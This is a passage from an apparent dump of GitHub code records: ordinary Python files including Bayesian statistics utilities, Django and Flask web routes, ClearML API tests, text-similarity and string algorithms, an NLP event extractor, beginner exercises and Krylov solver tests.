Smoothed log_weights. It must have the same shape as ``y_hat``\n\n Returns\n -------\n loo_pit: array or DataArray\n Value of the LOO-PIT at each observed data point.\n\n See Also\n --------\n plot_loo_pit : Plot Leave-One-Out probability integral transformation (PIT) predictive checks.\n loo : Compute Pareto-smoothed importance sampling leave-one-out\n cross-validation (PSIS-LOO-CV).\n plot_elpd : Plot pointwise elpd differences between two or more models.\n plot_khat : Plot Pareto tail indices for diagnosing convergence.\n\n Examples\n --------\n Calculate LOO-PIT values using as test quantity the observed values themselves.\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data(\"centered_eight\")\n ...: az.loo_pit(idata=data, y=\"obs\")\n\n Calculate LOO-PIT values using as test quantity the square of the difference between\n each observation and `mu`. Both ``y`` and ``y_hat`` inputs will be array-like,\n but ``idata`` will still be passed in order to calculate the ``log_weights`` from\n there.\n\n .. ipython::\n\n In [1]: T = data.observed_data.obs - data.posterior.mu.median(dim=(\"chain\", \"draw\"))\n ...: T_hat = data.posterior_predictive.obs - data.posterior.mu\n ...: T_hat = T_hat.stack(__sample__=(\"chain\", \"draw\"))\n ...: az.loo_pit(idata=data, y=T**2, y_hat=T_hat**2)\n\n \"\"\"\n y_str = \"\"\n if idata is not None and not isinstance(idata, DataTree):\n raise ValueError(\"idata must be of type DataTree or None\")\n\n if idata is None:\n if not all(isinstance(arg, (np.ndarray, xr.DataArray)) for arg in (y, y_hat, log_weights)):\n raise ValueError(\n \"all 3 y, y_hat and log_weights must be array or DataArray when idata is None \"\n f\"but they are of types {[type(arg) for arg in (y, y_hat, log_weights)]}\"\n )\n\n else:\n if y_hat is None and isinstance(y, str):\n y_hat = y\n elif y_hat is None:\n raise ValueError(\"y_hat cannot be None if y is not a str\")\n if isinstance(y, str):\n y_str = y\n y = idata.observed_data[y].values\n elif not isinstance(y, (np.ndarray, xr.DataArray)):\n raise ValueError(f\"y must be of types array, DataArray or str, not {type(y)}\")\n if isinstance(y_hat, str):\n y_hat = idata.posterior_predictive[y_hat].stack(__sample__=(\"chain\", \"draw\")).values\n elif not isinstance(y_hat, (np.ndarray, xr.DataArray)):\n raise ValueError(f\"y_hat must be of types array, DataArray or str, not {type(y_hat)}\")\n if log_weights is None:\n if y_str:\n try:\n log_likelihood = _get_log_likelihood(idata, var_name=y_str)\n except TypeError:\n log_likelihood = _get_log_likelihood(idata)\n else:\n log_likelihood = _get_log_likelihood(idata)\n log_likelihood = log_likelihood.stack(__sample__=(\"chain\", \"draw\"))\n posterior = convert_to_dataset(idata, group=\"posterior\")\n n_chains = len(posterior.chain)\n n_samples = len(log_likelihood.__sample__)\n ess_p = ess(posterior, method=\"mean\")\n # this mean is over all data variables\n reff = (\n (np.hstack([ess_p[v].values.flatten() for v in ess_p.data_vars]).mean() / n_samples)\n if n_chains > 1\n else 1\n )\n log_weights = psislw(-log_likelihood, reff=reff)[0].values\n elif not isinstance(log_weights, (np.ndarray, xr.DataArray)):\n raise ValueError(\n f\"log_weights must be None or of types array or DataArray, not {type(log_weights)}\"\n )\n\n if len(y.shape) + 1 != len(y_hat.shape):\n raise ValueError(\n f\"y_hat must have 1 more dimension than y, but y_hat has {len(y_hat.shape)} dims and \"\n f\"y has {len(y.shape)} dims\"\n )\n\n if y.shape != y_hat.shape[:-1]:\n raise ValueError(\n f\"y has shape: {y.shape} which should be equal to y_hat shape (omitting the last \"\n f\"dimension): {y_hat.shape}\"\n )\n\n if y_hat.shape != log_weights.shape:\n raise ValueError(\n \"y_hat and log_weights must have the same shape but have shapes \"\n f\"{y_hat.shape,} and {log_weights.shape}\"\n )\n\n kwargs = {\n \"input_core_dims\": [[], [\"__sample__\"], [\"__sample__\"]],\n \"output_core_dims\": [[]],\n \"join\": \"left\",\n }\n ufunc_kwargs = {\"n_dims\": 1}\n\n if y.dtype.kind == \"i\" or y_hat.dtype.kind == \"i\":\n y, y_hat = smooth_data(y, y_hat)\n\n return _wrap_xarray_ufunc(\n _loo_pit,\n y,\n y_hat,\n log_weights,\n ufunc_kwargs=ufunc_kwargs,\n **kwargs,\n )\n\n\ndef _loo_pit(y, y_hat, log_weights):\n \"\"\"Compute LOO-PIT values.\"\"\"\n sel = y_hat <= y\n if np.sum(sel) > 0:\n value = np.exp(_logsumexp(log_weights[sel]))\n return min(1, value)\n return 0\n\n\ndef weight_predictions(idatas, weights=None):\n \"\"\"Generate weighted posterior predictive samples from multiple InferenceData and their weights.\n\n Parameters\n ----------\n idatas : list[InferenceData]\n List of :class:`arviz.InferenceData` objects containing the groups `posterior_predictive`\n and `observed_data`. Observations should be the same for all InferenceData objects.\n weights : array-like, optional\n Individual weights for each model. Weights should be positive. If they do not sum up to 1,\n they will be normalized. Default, same weight for each model.\n Weights can be computed using many different methods including those in\n :func:`arviz.compare`.\n\n Returns\n -------\n idata: InferenceData\n Output InferenceData object with the groups `posterior_predictive` and `observed_data`.\n\n See Also\n --------\n compare : Compare models based on PSIS-LOO `loo` or WAIC `waic` cross-validation\n \"\"\"\n if len(idatas) < 2:\n raise ValueError(\"You should provide a list with at least two InferenceData objects\")\n\n if not all(\"posterior_predictive\" in idata.children for idata in idatas):\n raise ValueError(\n \"All the InferenceData objects must contain the `posterior_predictive` group\"\n )\n\n if not all(idatas[0].observed_data.equals(idata.observed_data) for idata in idatas[1:]):\n raise ValueError(\"The observed data should be the same for all InferenceData objects\")\n\n if weights is None:\n weights = np.ones(len(idatas)) / len(idatas)\n elif len(idatas) != len(weights):\n raise ValueError(\n \"The number of weights should be the same as the number of InferenceData objects\"\n )\n\n weights = np.array(weights, dtype=float)\n weights /= weights.sum()\n\n len_idatas = [\n idata.posterior_predictive.dims[\"chain\"] * idata.posterior_predictive.dims[\"draw\"]\n for idata in idatas\n ]\n\n if not all(len_idatas):\n raise ValueError(\"At least one of your idatas has 0 samples\")\n\n new_samples = (np.min(len_idatas) * weights).astype(int)\n\n new_idatas = [\n extract(idata, group=\"posterior_predictive\", num_samples=samples).reset_coords()\n for samples, idata in zip(new_samples, idatas)\n ]\n\n weighted_samples = DataTree.from_dict(\n {\n \"posterior_predictive\": xr.concat(new_idatas, dim=\"sample\"),\n \"observed_data\": idatas[0].observed_data,\n }\n )\n\n return weighted_samples\n","repo_name":"arviz-devs/arviz-stats","sub_path":"src/arviz_stats/base/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":60511,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31186668722","text":"import json\nimport codecs\nimport gzip\nimport os\n\nimport argparse\nimport random\n\nfrom collections import defaultdict\n\nimport numpy as np\nfrom scipy import linalg\n\nuserIDCount = 0\nuserIDMap = {}\n\nitemIDCount = 0\nitemIDMap = {}\n\n\ndef getUserID(reviewerID):\n global userIDCount\n if reviewerID not in userIDMap:\n userIDMap[reviewerID] = userIDCount\n userIDCount = userIDCount + 1\n return userIDMap[reviewerID]\n\n\ndef getItemID(asin):\n global itemIDCount\n if asin not in itemIDMap:\n itemIDMap[asin] = itemIDCount\n itemIDCount = itemIDCount + 1\n return itemIDMap[asin]\n\n\ndef parse(path):\n \"\"\"parse json.gz file\"\"\"\n g = gzip.open(path, 'rb')\n for l in g:\n yield json.loads(l.decode())\n\n\ndef get_time_stamp(tmStr):\n Comma = tmStr.index(',')\n return int(tmStr[Comma+2:]+tmStr[0:2]+tmStr[3:Comma])\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='dataGenerator')\n\n parser.add_argument('--data_path', default=\"Video_Games.json.gz\", type=str, help='data path')\n parser.add_argument('--meta_data_path', default=\"meta_Video_Games.json.gz\", type=str, help='meta data path')\n parser.add_argument('--output_file', default=\"./Video_game_network.txt\", type=str, help='output file')\n parser.add_argument('--rumor_file', default=\"./rumor.txt\", type=str, help='output file')\n parser.add_argument('--item_bound', default=100, type=int, help='item bound')\n parser.add_argument('--user_bound', default=10, type=int, help='user bound')\n args = parser.parse_args()\n\n userCount=defaultdict(int)\n itemCount=defaultdict(int)\n\n for d in parse(args.data_path):\n userCount[d['reviewerID']] += 1\n itemCount[d['asin']] += 1\n\n user_buy = defaultdict(list) # 'user' -> [('item','time')]\n edges_weight = {} # item edge -> weight\n item_user = defaultdict(list) # {'item: ['user']}\n edge_num = 0\n for d in parse(args.meta_data_path):\n if itemCount[d['asin']] < args.item_bound:\n continue\n itemID = getItemID(d['asin'])\n for also_buy in d['also_buy']:\n if itemCount[also_buy] < args.item_bound:\n continue\n edges_weight[(itemID, getItemID(also_buy))] = 0\n\n for d in parse(args.data_path):\n if userCount[d['reviewerID']] 80:\n print(\"Congratulations! You won.\")\n\n# Example\n\nname = \"Gino\"\n\nif name == \"Gino\":\n print(\"Hi, Gino!\")\n\n# If/else statements\n\nname = \"Gino\"\n\nif name == \"Gino\":\n print(\"Hi, Gino!\")\nelse:\n print(\"Hey! Your name is NOT Gino.\")\n\n# If/elif/else statements\n\nx = 6\n\nif x > 3:\n print(\"Hello, World!\")\nelif x > 0:\n print(\"Python is awesome\")\nelse:\n print(\"Have an awesome day\")\n","repo_name":"estefaniacn/python-code-examples","sub_path":"11 - Conditionals/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24015354681","text":"from django.conf.urls import url\nfrom .views import *\n\nurlpatterns = [\n url(r'^$', index, name='index'),\n url(r'^index$', index, name='index'),\n url(r'^user/register$', register, name='register'),\n url(r'^user/login$', user_login, name='login'),\n url(r'^user/logout$', user_logout, name='logout'),\n url(r'^user/(?P[0-9]+)/index$', show_user_profile, name='show_user_profile'),\n url(r'^user/edit$', edit_user_profile, name='edit_user_profile'),\n url(r'^user/password$', edit_user_password, name='edit_user_password'),\n url(r'^user/authority$', edit_user_authority, name='edit_user_authority'),\n\n url(r'^category/index$', show_categories, name='categories'),\n url(r'^category/add$', add_category, name='add_category'),\n url(r'^category/(?P[0-9]+)/index$', show_category, name='category_detail'),\n url(r'^category/(?P[0-9]+)/update$', update_category, name='update_category'),\n url(r'^category/(?P[0-9]+)/rank$', show_category_rank, name='category_rank'),\n\n url(r'^question/index$', show_questions, name='questions'),\n url(r'^question/add$', add_question, name='add_question'),\n url(r'^question/(?P[0-9]+)/index$', show_question, name='question_detail'),\n url(r'^question/(?P[0-9]+)/submit$', answer_submit, name='submit'),\n url(r'^question/(?P[0-9]+)/submission$', show_question_submissions, name='submission'),\n url(r'^question/(?P[0-9]+)/update$', update_question, name='update_question'),\n\n url(r'^submission/index$', show_submissions, name='submissions'),\n url(r'^submission/(?P[0-9]+)/index', show_submission, name='show_submission'),\n url(r'^submission/(?P[0-9]+)/edit', edit_submission, name='edit_submission'),\n\n url(r'^exam/index$', show_exams, name='exams'),\n url(r'^exam/(?P[0-9]+)/index', show_exam, name='exam_detail'),\n url(r'^exam/(?P[0-9]+)/question/(?P[0-9]+)/index',\n show_exam_question, name='exam_question_detail'),\n url(r'^exam/(?P[0-9]+)/question/(?P[0-9]+)/submit',\n exam_answer_submit, name='exam_submit'),\n url(r'^exam/(?P[0-9]+)/question/(?P[0-9]+)/submission',\n show_exam_question_submissions, name='exam_submission'),\n url(r'^exam/add$', add_exam, name='add_exam'),\n url(r'^exam/(?P[0-9]+)/update$', update_exam, name='update_exam'),\n url(r'exam/(?P[0-9]+)/rank$', show_exam_rank, name='exam_rank'),\n url(r'exam/generate$', generate_random_exam, name='generate_exam'),\n\n url(r'^test$', test, name='test')\n]\n","repo_name":"aKiteRunner/my_website","sub_path":"my_site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4192508050","text":"from flask import Flask, render_template, request, redirect # added request\n\napp = Flask(__name__)\n# our index route will handle rendering our form\n@app.route('/')\ndef index():\n print(request.form)\n return render_template(\"index.html\")\n\n\n@app.route('/users', methods=['POST'])\ndef Dojo():\n print(\"Got Post Info\")\n print(request.form)\n name_from_form = request.form['name']\n location_from_form = request.form['location']\n languages_from_form = request.form['languages']\n commment_from = request.form['commment']\n return render_template(\"show.html\",commment=commment_from, name_on_template=name_from_form, languages_on_template=languages_from_form,location_from_form=location_from_form)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"AlihTamrawe/Flask","sub_path":"flask/flask_fundamentals/Dojo_Survey/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30570169236","text":"from apiserver.apierrors import errors\nfrom apiserver.database.model import EntityVisibility\nfrom apiserver.tests.automated import TestService\nfrom apiserver.database.utils import id as db_id\n\n\nclass TestProjectsDelete(TestService):\n def new_task(self, type=\"testing\", **kwargs):\n return self.create_temp(\n \"tasks\", type=type, name=db_id(), **kwargs\n )\n\n def new_model(self, **kwargs):\n return self.create_temp(\"models\", uri=\"file:///a/b\", name=db_id(), labels={}, **kwargs)\n\n def new_project(self, name=None, **kwargs):\n return self.create_temp(\"projects\", name=name or db_id(), description=\"\", **kwargs)\n\n def test_delete_fails_with_active_task(self):\n project = self.new_project()\n self.new_task(project=project)\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.tasks, 1)\n self.assertEqual(res.non_archived_tasks, 1)\n with self.api.raises(errors.bad_request.ProjectHasTasks):\n self.api.projects.delete(project=project)\n\n def test_delete_with_archived_task(self):\n project = self.new_project()\n self.new_task(project=project, system_tags=[EntityVisibility.archived.value])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.tasks, 1)\n self.assertEqual(res.non_archived_tasks, 0)\n self.api.projects.delete(project=project)\n\n def test_delete_fails_with_active_model(self):\n project = self.new_project()\n self.new_model(project=project)\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.models, 1)\n self.assertEqual(res.non_archived_models, 1)\n with self.api.raises(errors.bad_request.ProjectHasModels):\n self.api.projects.delete(project=project)\n\n def test_delete_with_archived_model(self):\n project = self.new_project()\n self.new_model(project=project, system_tags=[EntityVisibility.archived.value])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.models, 1)\n self.assertEqual(res.non_archived_models, 0)\n self.api.projects.delete(project=project)\n\n def test_delete_dataset(self):\n name = \"Test datasets delete\"\n project = self.new_project(name=name)\n dataset = self.new_project(f\"{name}/.datasets/test dataset\", system_tags=[\"dataset\"])\n task = self.new_task(project=dataset, system_tags=[\"dataset\"])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.datasets, 1)\n with self.api.raises(errors.bad_request.ProjectHasDatasets):\n self.api.projects.delete(project=project)\n\n self.api.tasks.delete(task=task)\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.datasets, 0)\n self.api.projects.delete(project=project)\n\n def test_delete_pipeline(self):\n name = \"Test pipelines delete\"\n project = self.new_project(name=name)\n pipeline = self.new_project(f\"{name}/.pipelines/test pipeline\", system_tags=[\"pipeline\"])\n task = self.new_task(project=pipeline, type=\"controller\", system_tags=[\"pipeline\"])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.pipelines, 1)\n with self.api.raises(errors.bad_request.ProjectHasPipelines):\n self.api.projects.delete(project=project)\n\n self.api.tasks.edit(task=task, system_tags=[EntityVisibility.archived.value])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.pipelines, 0)\n self.api.projects.delete(project=project)\n","repo_name":"allegroai/clearml-server","sub_path":"apiserver/tests/automated/test_project_delete.py","file_name":"test_project_delete.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"21"} +{"seq_id":"6496232036","text":"from collections import defaultdict\nimport re\n\nfrom text_comparer.similarity import similarity\n\n\ndef word_frequencies(word_vector):\n \"\"\"What percent of the time does each word in the vector appear?\n\n Returns a dictionary mapping each word to its frequency.\n\n \"\"\"\n num_words = len(word_vector)\n frequencies = defaultdict(float)\n for word in word_vector:\n frequencies[word] += 1.0 / num_words\n\n return dict(frequencies)\n\n\ndef compare_vectors(word_vector1, word_vector2):\n \"\"\"Numerical similarity between lists of words. Higher is better.\n\n Uses cosine similarity.\n Result range: 0 (bad) - 1 (uses all the same words in the same proportions)\n\n \"\"\"\n all_words = list(set(word_vector1).union(set(word_vector2)))\n frequency_dict1 = word_frequencies(word_vector1)\n frequency_dict2 = word_frequencies(word_vector2)\n\n frequency_vector1 = [frequency_dict1.get(word, 0) for word in all_words]\n frequency_vector2 = [frequency_dict2.get(word, 0) for word in all_words]\n\n return similarity(frequency_vector1, frequency_vector2)\n\n\ndef vectorize_text(text):\n \"\"\"Takes in text, processes it, and vectorizes it.\"\"\"\n\n def remove_punctuation(text):\n \"\"\"Removes special characters from text.\"\"\"\n return re.sub('[,.?\";:\\-!@#$%^&*()]', '', text)\n\n def remove_common_words(text_vector):\n \"\"\"Removes 50 most common words in the uk english.\n\n source: http://www.bckelk.ukfsn.org/words/uk1000n.html\n\n \"\"\"\n common_words = set(['the', 'and', 'to', 'of', 'a', 'I', 'in', 'was',\n 'he', 'that', 'it', 'his', 'her', 'you', 'as', 'had', 'with',\n 'for', 'she', 'not', 'at', 'but', 'be', 'my', 'on', 'have', 'him',\n 'is', 'said', 'me', 'which', 'by', 'so', 'this', 'all', 'from',\n 'they', 'no', 'were', 'if', 'would', 'or', 'when', 'what', 'there',\n 'been', 'one', 'could', 'very', 'an', 'who'])\n return [word for word in text_vector if word not in common_words]\n\n text = text.lower()\n text = remove_punctuation(text)\n words_list = text.split()\n words_list = remove_common_words(words_list)\n\n return words_list\n\n\ndef compare_texts(text1, text2):\n \"\"\"How similar are the two input paragraphs?\"\"\"\n return compare_vectors(vectorize_text(text1), vectorize_text(text2))\n","repo_name":"sergeio/text_comparer","sub_path":"text_comparer/vectorizer.py","file_name":"vectorizer.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"24061515080","text":"# -----------------------------------------\n# My Solution\n#\n# Time Complexity: O(d(m + n) + nlog(n) + n)\n# Space Complexity: O(n)\n# -----------------------------------------\n# d := len(dict), m := max(len(word) for word in dict), n := len(string)\n# Note: This solution requires KMP pattern matching algorithm\nfrom collections import deque\n\ndef kmp_matched_indexes(haystack, needle):\n if not needle:\n return 0\n # generate next_arr array, need O(n) time\n i, j = -1, 0\n next_arr = [-1] * len(needle)\n while j < len(needle) - 1:\n # needle[i] stands for prefix, neelde[j] stands for postfix\n if i == -1 or needle[i] == needle[j]:\n i += 1\n j += 1\n next_arr[j] = i\n else:\n i = next_arr[i]\n # check through the haystack using next_arr, need O(m) time\n matched_indexes = []\n i = 0\n while i < len(haystack):\n j = 0\n while i < len(haystack) and j < len(needle):\n if j == -1 or haystack[i] == needle[j]:\n i += 1\n j += 1\n else:\n j = next_arr[j]\n if j == len(needle):\n matched_indexes.append((i - j, i - j + len(needle) - 1))\n\n return matched_indexes\n\ndef add_bold_tag(string, dict):\n if len(dict) == 0:\n return string\n\n matched_intervals = []\n for word in dict:\n for interval in kmp_matched_indexes(string, word):\n matched_intervals.append(interval)\n if len(matched_intervals) == 0:\n return string\n\n matched_intervals = deque(sorted(matched_intervals))\n interval_pointer = 0\n while interval_pointer < len(matched_intervals) - 1:\n curr_interval, next_interval = matched_intervals[interval_pointer], matched_intervals[interval_pointer + 1]\n if curr_interval[0] <= next_interval[0] <= curr_interval[1] + 1:\n matched_intervals[interval_pointer + 1] = (curr_interval[0], max(curr_interval[1], next_interval[1]))\n matched_intervals.popleft()\n else:\n interval_pointer += 1\n\n bold_tags_string = \"\"\n interval_pointer = 0\n for string_index in range(len(string)):\n curr_interval = matched_intervals[interval_pointer] if interval_pointer < len(matched_intervals) else None\n if curr_interval is None or string_index not in curr_interval:\n bold_tags_string += string[string_index]\n elif string_index == curr_interval[0]:\n bold_tags_string += \"\" + string[string_index]\n elif string_index == curr_interval[1]:\n bold_tags_string += string[string_index] + \"\"\n interval_pointer += 1\n return bold_tags_string\n\nprint(add_bold_tag(\"abcxyz123\", [\"abc\",\"123\"]) == \"abcxyz123\")\nprint(add_bold_tag(\"aaabbcc\", [\"aaa\", \"aab\", \"bc\"]) == \"aaabbcc\")\n","repo_name":"DaMinaup6/algorithm-exercises","sub_path":"leetcode/medium/616_add_bold_tag_in_string.py","file_name":"616_add_bold_tag_in_string.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31818033732","text":"import re\nimport os\nimport nltk\nfrom nltk import word_tokenize, pos_tag\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom xml.etree import ElementTree\nfrom collections import defaultdict\n\n\ndef eachFile(filepath):\n filenames=[]\n pathDir = os.listdir(filepath)\n for allDir in pathDir:\n child = os.path.join('%s//%s' % (filepath, allDir))\n filenames.append(child)\n return filenames\n\n\ndef sentence_split(str_sentence):\n \"\"\"\n 分句\n Args:\n str_sentence: str, 文本内容\n Returns:\n list_ret: list, 完成分句的句子列表\n \"\"\"\n clean_con = re.sub('<[^>]*>', '', str_sentence)\n # clean_con = clean_con.replace('\\n','')\n list_ret = []\n tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n for s_str in clean_con.split('\\n'):\n s = tokenizer.tokenize(s_str)\n list_ret = list_ret + s\n # print(list_ret)\n return list_ret\n\n\ndef get_extend_attrib(source_path, offset, text):\n \"\"\"\n 获取事件所在的句子、词性、相对位置等信息\n Args:\n source_path: str, 原文路径\n offset: int, 触发词在原文中的位置\n text: str, 触发词\n returns:\n sentence: str, 句子\n tags: str, 词性标签\n position: int, 相对位置\n \"\"\"\n context = open(source_path, 'r', encoding='utf-8').read()\n tempcon = context[0:offset]\n sent_index = len(sentence_split(tempcon)) - 1\n startoff, endoff = 0, 0 # 句子的始末位置\n for index in range(offset, -1, -1): # 向前查找\n if context[index] in ['\"', '.', '!', '。', '?', '\\n', '>']:\n startoff = index + 1\n break\n for index in range(offset, len(context), 1): # 向后查找\n if context[index] in ['.', '!', '。', '?', '\\n', '<']:\n endoff = index + 1\n break\n sentence = context[startoff: endoff]\n sentence = sentence.strip('\\n')\n sentence = sentence.lower().replace('↑', ':')\n words = word_tokenize(sentence) # 分词\n position = 0\n try:\n position = words.index(word_tokenize(text)[0]) # 触发词在句中的位置, 对触发词分词的目的防止触发词由多个单词构成, 获取第一个词位置\n except Exception:\n text = word_tokenize(text)[0]\n for index in range(len(words)):\n if text in words[index]:\n position = index\n tagged = pos_tag(words)\n tags = list(map(lambda x: x[1], tagged))\n tag = tags[position]\n tags = ' '.join(tags) # 词性标注\n\n return sentence, tags, position, sent_index, tag\n\n\ndef get_eminfo(ere_path, source_path):\n eachfileems = []\n tree = ElementTree.parse(ere_path)\n root = tree.getroot()\n\n for hoppernode in root.iter('hopper'):\n hopper1 = hoppernode.get('id')\n for eventnode in hoppernode.iter('event_mention'):\n eventmention = defaultdict(dict)\n eventmention['hopper_id'] = hopper1\n arg_role = []\n id1 = eventnode.get('id')\n eventmention['em_id'] = id1\n\n type1 = eventnode.get('type')\n eventmention['type'] = type1\n\n subtype1 = eventnode.get('subtype')\n eventmention['subtype'] = subtype1\n\n realis1 = eventnode.get('realis')\n eventmention['realis'] = realis1\n\n triggernode = eventnode.find('trigger')\n source1 = triggernode.get('source')\n eventmention['source'] = source1\n\n offset1 = triggernode.get('offset')\n trigger1 = triggernode.text\n\n lem = WordNetLemmatizer()\n trigger_etyma1 = lem.lemmatize(trigger1, \"v\")\n eventmention['trigger'] = trigger_etyma1\n\n sentence, tags, position, sent_index, tag = get_extend_attrib(source_path, int(offset1), trigger1)\n #print(tags.split(' '))\n eventmention['sentence'] = sentence\n eventmention['tags'] = tags\n eventmention['position'] = position\n eventmention['sent_index'] = sent_index\n eventmention['tag'] = tag\n\n for em_arg in eventnode.iter('em_arg'):\n arg1 = em_arg.text\n role1 = em_arg.get('role')\n arg_role.append((arg1, role1))\n eventmention['arg_role'] = arg_role\n eachfileems.append(eventmention)\n\n return eachfileems\n\n\ndef ems2txt(eachfileems, txtpath):\n f = open(txtpath, 'w', encoding='utf-8')\n for em in eachfileems:\n f.write(em['source'] + '|' + em['hopper_id'] + '|' + em['em_id'] + '|' + em['type'] + '|' +\n em['subtype'] + '|' + em['realis'] + '|' + em['trigger'] + '|' + str(em['position']) + '|'\n + str(em['sent_index']) + '|' + em['sentence'] + '|' + em['tag'] + '|' + em['tags'] + '|')\n '''for item in em['tags']:\n f.write(item + ' ')\n f.write('|')'''\n for item in em['arg_role']:\n f.write(item[0] + '+' + item[1] + '#')\n f.write('\\n')\n f.close()\n\n\nere_paths = eachFile('G:\\ldc17\\eresour\\ere')\nsource_paths = eachFile('G:\\ldc17\\eresour\\source')\nn = len(ere_paths)\nfor i in range(n):\n ere_path = ere_paths[i]\n source_path = source_paths[i]\n name = os.path.basename(source_path)\n name = name[:-4] + '.txt'\n into_path = \"G:\\\\ldc17\\\\fileems1\" + '\\\\' + name\n #print(into_path)\n evs = get_eminfo(ere_path, source_path)\n print(evs)\n ems2txt(evs, into_path)\n","repo_name":"daiqianwen/projects","sub_path":"build_corpus.py","file_name":"build_corpus.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72547506988","text":"objeto_procurado = input()\r\nlista_itens = input()\r\nlista_itens = lista_itens.split(', ')\r\n# print(lista_itens)\r\n# print(len(lista_itens))\r\nitens_repetidos = []\r\ncoeficiente_erro = float()\r\nqt_item_mais_repetido = 0\r\nitens_diferentes = []\r\nnao_repetidos = []\r\nitens_iguais_print = []\r\n\r\nfor i in lista_itens:\r\n if i not in nao_repetidos:\r\n nao_repetidos.append(i)\r\n else:\r\n itens_repetidos.append(i)\r\n \r\nfor k in itens_repetidos:\r\n if k not in itens_diferentes:\r\n itens_diferentes.append(k)\r\n print(f'Após análises, percebi que {str(k)} foi coletado mais de uma vez...')\r\n\r\n else:\r\n itens_iguais_print.append(k)\r\n\r\nitens_repetidos = []\r\nfor i in range(len(lista_itens)):\r\n qt_itens_repetidos = 0\r\n if lista_itens[i] not in itens_repetidos:\r\n for j in range(i+1, len(lista_itens)):\r\n if lista_itens[i] == lista_itens[j]:\r\n qt_itens_repetidos+=1\r\n itens_repetidos.append(lista_itens[i])\r\n \r\n if qt_item_mais_repetido <= qt_itens_repetidos:\r\n qt_item_mais_repetido = qt_itens_repetidos\r\n \r\n\r\n\r\nif len(itens_repetidos) > 0:\r\n coeficiente_erro = (len(lista_itens)) / (qt_item_mais_repetido+1)\r\n print('Certo, o coeficiente de erros de viagens interdimensionais é {:.2f}'.format(coeficiente_erro))\r\n\r\n\r\nif objeto_procurado in lista_itens and (objeto_procurado not in itens_repetidos): \r\n print(f'Você encontrou o item necessário para me ajudar a voltar para minha dimensão! Finalmente voltarei para Gravity Falls!')\r\nelse: \r\n print(f'Que pena, você não encontrou o item necessário para me ajudar a voltar para minha dimensão...')\r\n \r\nprint('(Como prometido, você retorna ao DA do CIn. Mas, por razões desconhecidas, você se esquece do ocorrido)')\r\nprint('O walkie-talkie está na sua mão. Depois de um tempo, você diz: \"Que aparelho velho!\"')\r\nprint('(Após pensar sobre o que fazer com o walkie-talkie, você resolve jogá-lo no banheiro do CIn)')\r\n\r\n\r\n\r\n\r\n","repo_name":"gabrielrochass/Python-Questions","sub_path":"python/List3_lists/question5.py","file_name":"question5.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12461334521","text":"import numpy as np\nimport pytest\nimport scipy.sparse\nimport scipy.sparse.linalg\n\nimport krylov\n\n\n# separate out the householder test because it doesn't support non-vector right-hand\n# sides yet.\n@pytest.mark.parametrize(\"b_shape\", [(5,), (5, 1)])\ndef test_orthogonalization_householder(b_shape):\n # build Hermitian, indefinite matrix\n n = b_shape[0]\n a = np.array(np.linspace(1.0, 2.0, n), dtype=complex)\n a[-1] = 1e-3\n A = np.diag(a)\n A[-1, 0] = 10j\n A[0, -1] = -10j\n b = np.ones(b_shape, dtype=complex)\n\n ortho = \"householder\"\n\n _, info = krylov.gmres(A, b, tol=1.0e-12, ortho=ortho)\n assert info.success\n assert np.all(info.resnorms[-1] <= 1.0e-11)\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\n@pytest.mark.parametrize(\"b_shape\", [(5,), (5, 1), (5, 3)])\ndef test_explicit_residual(solver, b_shape):\n a = np.linspace(1.0, 2.0, b_shape[0])\n a[-1] = 1e-2\n A = np.diag(a)\n b = np.ones(b_shape)\n\n _, info = solver(A, b, tol=1.0e-7)\n assert np.all(info.resnorms[-1] < 1.0e-7)\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg])\n@pytest.mark.parametrize(\"b_shape\", [(5,), (5, 1), (5, 3)])\ndef test_return_arnoldi(solver, b_shape):\n a = np.linspace(1.0, 2.0, b_shape[0])\n a[-1] = 1e-2\n A = np.diag(a)\n b = np.ones(b_shape)\n\n _, info = solver(A, b, tol=1.0e-7, return_arnoldi=True)\n assert np.all(info.resnorms[-1] < 1.0e-7)\n\n\n# @pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\n# def test_final_error_norm(solver):\n# np.random.seed(0)\n# A = np.random.rand(5, 5)\n# b = np.random.rand(5)\n# exact = np.linalg.solve(A, b)\n#\n# ls = krylov.linear_system.LinearSystem(\n# A=A,\n# b=b,\n# exact_solution=exact,\n# 